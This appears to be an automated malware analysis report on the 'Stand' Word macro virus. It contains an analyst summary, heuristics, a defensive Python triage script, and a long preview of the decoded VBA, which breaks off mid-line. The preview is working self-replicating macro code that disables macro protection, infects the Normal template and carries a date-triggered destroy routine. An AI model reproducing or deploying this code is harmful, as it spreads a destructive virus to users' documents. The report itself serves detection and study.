Verdict: MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The decoded VBA is a self-replicating Word macro virus, not a downloader. The ThisDocument module defines the event handlers Document_Open, Document_New and Document_Close, so the code runs when the document is opened, when a new document is created from the template, and when the document is closed. Document_Open and Document_New call Stand, which: sets Options.VirusProtection = False (the Word 97 macro warning) and ConfirmConversions and SaveNormalPrompt to False to suppress prompts; sets Application.EnableCancelKey so Ctrl+Break cannot interrupt it; removes any existing AutoOpen, AutoClose, AutoNew, Document_* and Stand* procedures from the first VBA component of NormalTemplate and then of ActiveDocument (StandClear walks each routine from its declaration to End Sub or End Function with CodeModule.DeleteLines); writes its own procedures to the scratch file c:\Stand.log via StandWrite, calls StandInfect, and deletes the scratch file; and finally re-saves the active document under its own name if it has already been saved, so the copy travels with the file. Infection of the Normal template is the persistence mechanism: every document opened or created afterwards inherits the macros. The comment 'Copies: 257' is possibly a generation counter. The file c:\kill.log is a time-based trigger rather than persistence: on the first Document_Close the macro writes a date 1 to 30 days ahead into it and marks it hidden and read-only; on every later close it reads the date back and calls StandDestroy once that date has been reached (StandDestroy lies outside the preview). With probability 1/10 per run, Stand also opens the File Summary Info dialog with the title "Stand Macro Carrier", author "Lonely Mad" and keywords "I'll destroy you". The ClamAV hits (Win.Trojan.Pivis-2 on the document, Doc.Trojan.Akuma-3 on the extracted module) and the legacy WordBasic marker are consistent with an old-style macro virus; no network activity or external payload is visible in the preview. Two caveats on the heuristics below: in the visible part of the preview, AutoOpen and AutoClose occur only as string literals passed to StandClear, while the handlers actually defined are Document_Open, Document_New and Document_Close (the extracted module is 31,494 bytes and the preview is truncated, so the AutoOpen and Auto_Close findings may still match code outside the excerpt; note also that Word's auto macro is AutoClose, Auto_Close being the Excel name); and the legacy-marker description's statement that no modern VBA project was recovered is contradicted by the extracted macros.bas and should be read as canned text.
Heuristics (6)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
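To check the handler findings on the decoded module yourself, the following Python script is an added example; it is not part of this report, of the analyzer, or of oletools. It scans olevba-style decoded VBA text, lists the auto-exec procedures that are actually declared, lists auto-exec names that occur only inside string literals (the StandClear arguments in the preview), and tags the capabilities visible in the preview. The SAMPLE excerpt is constructed for the example and modelled on the preview, and the capability regex table is this example's own assumption, not the analyzer's rule set.

```python
"""Static triage of a decoded VBA module (e.g. olevba output).

Added example for this report; not code from the analyzer or from oletools.
It separates auto-exec handlers the module actually defines from handler
names that only appear inside string literals, and tags the capabilities
that are visible in the macro preview.
"""
import json
import re
from typing import Dict, List

# Procedures Word runs without user action: legacy auto macros plus the
# ThisDocument event procedures.
AUTO_EXEC = ("AutoOpen", "AutoClose", "AutoNew", "AutoExec", "AutoExit",
             "Document_Open", "Document_Close", "Document_New")
_CANON = {name.lower(): name for name in AUTO_EXEC}

# Capability patterns (assumed for this example, not the analyzer's rules).
CAPABILITIES = {
    r"\.VirusProtection\s*=\s*False": "disables Word 97 macro virus protection",
    r"\.VBProject\.VBComponents": "accesses VBA project code (self-replication)",
    r"\bNormalTemplate\b": "touches the Normal template (persistence)",
    r"\bCodeModule\.(DeleteLines|InsertLines|AddFromString)\b": "rewrites macro code at run time",
    r'\bKill\s+"': "deletes files",
    r"\bSetAttr\b.*\bvbHidden\b": "hides files via attributes",
    r'\bOpen\s+".*"\s+For\s+Output\b': "writes files",
    r"\.EnableCancelKey\s*=": "blocks Ctrl+Break interruption",
}

# A procedure declaration at the start of a line; the name is group 1.
_DEF_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(",
                     re.IGNORECASE)
_STR_RE = re.compile(r'"([^"]*)"')


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, but keep an apostrophe inside a string literal."""
    out, in_str = [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        out.append(ch)
    return "".join(out)


def triage(vba_source: str) -> Dict[str, object]:
    defined: List[str] = []   # auto-exec procedures actually declared, in order
    mentioned = set()         # auto-exec names seen inside "..." literals
    caps = set()
    for raw in vba_source.splitlines():
        line = strip_comment(raw)
        m = _DEF_RE.match(line)
        if m:
            name = _CANON.get(m.group(1).lower())
            if name and name not in defined:
                defined.append(name)
        for literal in _STR_RE.findall(line):
            for name in AUTO_EXEC:
                if re.search(rf"\b{name}\b", literal, re.IGNORECASE):
                    mentioned.add(name)
        for pattern, label in CAPABILITIES.items():
            if re.search(pattern, line, re.IGNORECASE):
                caps.add(label)
    return {
        "auto_exec_defined": defined,
        "auto_exec_only_in_strings": sorted(mentioned - set(defined)),
        "capabilities": sorted(caps),
    }


# Constructed excerpt modelled on the macro preview in this report.
SAMPLE = r'''
Attribute VB_Name = "ThisDocument"
Private Sub Document_Close()
'Stand
On Error Resume Next
If Dir("c:\kill.log", vbArchive + vbHidden + vbReadOnly) = "" Then
Open "c:\kill.log" For Output As #1
Print #1, DateAdd("d", Int((30 * Rnd) + 1), Date)
Close #1
SetAttr "c:\kill.log", vbArchive + vbHidden + vbReadOnly
End If
End Sub
Private Sub Document_Open()
Stand
End Sub
Private Sub Document_New()
Stand
End Sub
Private Sub Stand()
Application.EnableCancelKey = Not -1
With Options
.VirusProtection = False
End With
Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
db = StandClear(bry, "Sub Document_Open()")
db = StandClear(bry, "Sub AutoOpen()")
db = StandClear(bry, "Private Sub AutoClose()")
db = StandClear(bry, "Sub AutoNew()")
Kill "c:\Stand.log"
With Dialogs(wdDialogFileSummaryInfo)
.Keywords = "I'll destroy you"
End With
End Sub
Private Function StandClear(DoveM, StartM)
DoveM.CodeModule.DeleteLines (Count)
End Function
'''

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it against the real macros.bas with `triage(open("macros.bas", encoding="latin-1").read())`. A name that appears under auto_exec_only_in_strings but not under auto_exec_defined is a heuristic hit on text, not on an executable handler, and should be re-checked against the full module rather than the truncated preview.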
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31494 bytes |

SHA-256: 6f44240550e668fb8caa0f601c3b0c8f004e288366cf94d9228ea23ea6ffc8db
Detection (ClamAV): Doc.Trojan.Akuma-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Stand
'1
On Error Resume Next
If Dir("c:\kill.log", vbArchive + vbHidden + vbReadOnly) = "" Then
Open "c:\kill.log" For Output As #1
Randomize
Dataccia = DateAdd("d", Int((30 * Rnd) + 1), Date)
Print #1, Dataccia
Close #1
SetAttr "c:\kill.log", vbArchive + vbHidden + vbReadOnly
Else
Open "c:\kill.log" For Input As #1
Line Input #1, Dataccia
If DateDiff("d", Date, Dataccia) <= 0 Then StandDestroy
Close #1
End If
End Sub
Private Sub Document_Open()
'Stand
'1
Stand
End Sub
Private Sub Document_New()
'Stand
'1
Stand
End Sub
Private Sub Stand()
'Stand
'1
'Copies: 257
On Error Resume Next
stato = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Application.DisplayRecentFiles = True
RecentFiles.Maximum = 9
Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
For c = 1 To 2
db = StandClear(bry, "Sub Document_Close()")
db = StandClear(bry, "Private Sub Document_Close()")
db = StandClear(bry, "Sub Document_New()")
db = StandClear(bry, "Private Sub Document_New()")
db = StandClear(bry, "Sub Document_Open()")
db = StandClear(bry, "Private Sub Document_Open()")
db = StandClear(bry, "Sub AutoClose()")
db = StandClear(bry, "Private Sub AutoClose()")
db = StandClear(bry, "Sub AutoOpen()")
db = StandClear(bry, "Private Sub AutoOpen()")
db = StandClear(bry, "Sub AutoNew()")
db = StandClear(bry, "Private Sub AutoNew()")
db = StandClear(bry, "Private Sub Stand()")
db = StandClear(bry, "Private Function StandClear(DoveM, StartM)")
db = StandClear(bry, "Private Sub StandDestroy()")
db = StandClear(bry, "Private Function StandFind(DoveM, StartM, Infect)")
db = StandClear(bry, "Private Function StandInfect()")
db = StandClear(bry, "Private Function StandWrite(StartM)")
Set bry = ActiveDocument.VBProject.VBComponents.Item(1)
Next c
SetAttr "c:\Stand.log", vbNormal
Kill "c:\Stand.log"
Open "c:\Stand.log" For Output As #1
db = StandWrite("Private Sub Document_Close()")
db = StandWrite("Private Sub Document_Open()")
db = StandWrite("Private Sub Document_New()")
db = StandWrite("Private Sub Stand()")
db = StandWrite("Private Function StandClear(DoveM, StartM)")
db = StandWrite("Private Sub StandDestroy()")
db = StandWrite("Private Function StandFind(DoveM, StartM, Infect)")
db = StandWrite("Private Function StandInfect()")
db = StandWrite("Private Function StandWrite(StartM)")
Close #1
SetAttr "c:\Stand.log", vbNormal
StandInfect
Kill "c:\Stand.log"
Randomize
If Int((10 * Rnd) + 1) = 6 Then
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Stand Macro Carrier"
.Author = "Lonely Mad"
.Keywords = "I'll destroy you"
.Execute
End With
End If
If Left(ActiveDocument.Name, 8) <> "Document" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
ActiveDocument.Saved = stato
On Error GoTo 0
End Sub
Private Function StandClear(DoveM, StartM)
'Stand
'1
Count = StandFind(DoveM, StartM, True)
If Left(Count, 5) <> "Stand" Then
Do Until DoveM.CodeModule.Lines(Count, 1) = "End Sub" Or DoveM.CodeModule.Lines(Count, 1) = "End Function"
DoveM.CodeModule.DeleteLines (Count)
Loop
DoveM.CodeModule.DeleteLines (Count)
End If
End Function
Privat
... (truncated)